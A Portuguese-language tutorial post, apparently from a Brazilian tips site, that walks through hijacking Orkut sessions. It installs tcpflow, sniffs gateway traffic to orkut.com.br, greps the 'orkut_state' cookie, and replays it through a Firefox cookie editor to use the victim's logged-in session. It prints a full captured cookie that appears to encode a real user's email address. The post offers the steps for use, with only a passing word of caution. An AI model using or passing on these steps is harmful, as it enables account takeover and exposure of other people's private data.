Sou muito curioso na área de segurança e acabei descobrindo algo interessante. Muitos membros aqui já brincaram um pouco de hacker, pois bem, estou postando um tutorial que explora uma falha do Orkut. Espero que o Orkut resolva mais este bug...
Instalando o tcpflow (Sniffer)
Primeiramente iremos instalar um analisador de tráfego, o famoso
tcpflow. Para quem nunca utilizou, peço que dê uma olhadinha no site:
Instale ou baixe o pacote já pronto.
CentOS:
# yum install tcpflow
Debian:
# apt-get install tcpflow
Slackware:
# wget http://linuxpackages.inode.at/Slackware-12.0/Console/tcpflow/tcpflow-0.21-i486-1kan.tgz
# installpkg tcpflow-0.21-i486-1kan.tgz
:D
Sniffando rede Orkut
Bem, primeiramente precisamos ser o gateway da rede para analisarmos o tráfego pelo tcpflow. Segue o comando:
# tcpflow -i eth1 host www.orkut.com.br
No parâmetro acima pegamos todo o tráfego do domínio orkut.com.br. Deixe rodando por 3 minutos e finalize.
Digite:
# cat * | grep orkut_state
Ira aparecer uma lista enorme com vários caractere... Procure pelo cookie chamado orkut_state.
ORKUTPREF=ID=6914954405945645074:INF=0:SET=100914668:LNG=79:CNT=29:RM=0:
USR=YmlhemluaGFzdWRfQGhvdG1haWwuY29t:PHS=:TS=1282577740:LCL=pt-BR:NET=1:
TOS=1:GC=DQAAAHIAAAAsa6oFoD3EKn3oIzN--Fzws-
cc75k1Qa7PrlMECdkJGiCHV2qc7C3ph4YVLX5CSJj3aotEVvwC6FVJZThZNNdLGBYuCiLgIcO
YJqDG3ZMWY8daMYFnBc1YOUJ01JnvURpln3xe1C4QMVW9uIHiYJL3nQvYyoe6jRElQ4K7doNxjg:
PE=YmlhemluaGFzdWRfQGhvdG1haWwuY29t:GTI=0:GID=:VER=3:AST=0:SID=0:
GI=9185043685642045981:GTM=0:FSA=2:CU=1:GU=0:S=L+ByKo9nnXtXzT/Qr+HiO4xFhr0=:;
S=neworkut_borg=Ylnxv34anNBdLiHANiD5Vg; OSN=ID=FE6rpebB8Zs=:S=sR9V6nHRSjxLiNw0:
O início tem que ser ORKUTPREF e o final S=sR9V6nHRSjxLiNw0:.
Este cookie contém todas as informações necessárias para capturar a sessão do usuário. Vou ensinar como pegar este arquivo e capturar a sessão.
:D
Utilizando o cookie
Primeiro você deve ter o Mozilla Firefox:
E o editor de cookies do Firefox:
Agora você vai em ferramentas/Cookie Editor e adicione o seguinte cookie:
- Name: orkut_state
- Content: Cole o cookie da vitima "ORKUTPREF=ID=", ex.:
ORKUTPREF=ID=6914954405945645074:INF=0:SET=100914668:LNG=79:CNT=29:RM=0:
USR=YmlhemluaGFzdWRfQGhvdG1haWwuY29t:PHS=:TS=1282577740:LCL=pt-BR:NET=1:
TOS=1:GC=DQAAAHIAAAAsa6oFoD3EKn3oIzN--Fzws-
cc75k1Qa7PrlMECdkJGiCHV2qc7C3ph4YVLX5CSJj3aotEVvwC6FVJZThZNNdLGBYuCiLgIcO
YJqDG3ZMWY8daMYFnBc1YOUJ01JnvURpln3xe1C4QMVW9uIHiYJL3nQvYyoe6jRElQ4K7doNxjg:
PE=YmlhemluaGFzdWRfQGhvdG1haWwuY29t:GTI=0:GID=:VER=3:AST=0:SID=0:
GI=9185043685642045981:GTM=0:FSA=2:CU=1:GU=0:S=L+ByKo9nnXtXzT/Qr+HiO4xFhr0=:;
S=neworkut_borg=Ylnxv34anNBdLiHANiD5Vg; OSN=ID=FE6rpebB8Zs=:S=sR9V6nHRSjxLiNw0:
- Domain: www.orkut.com.br
- Path: /
- Never Expires
Abra o site:
E pronto... está utilizando a sessão do cara.
Interessante, mas tomem cuidado.
valmeida@idea-planejamento.com
Controle de banda com Shaper
Versão para impressora
Indicar para um amigo
Enviar dica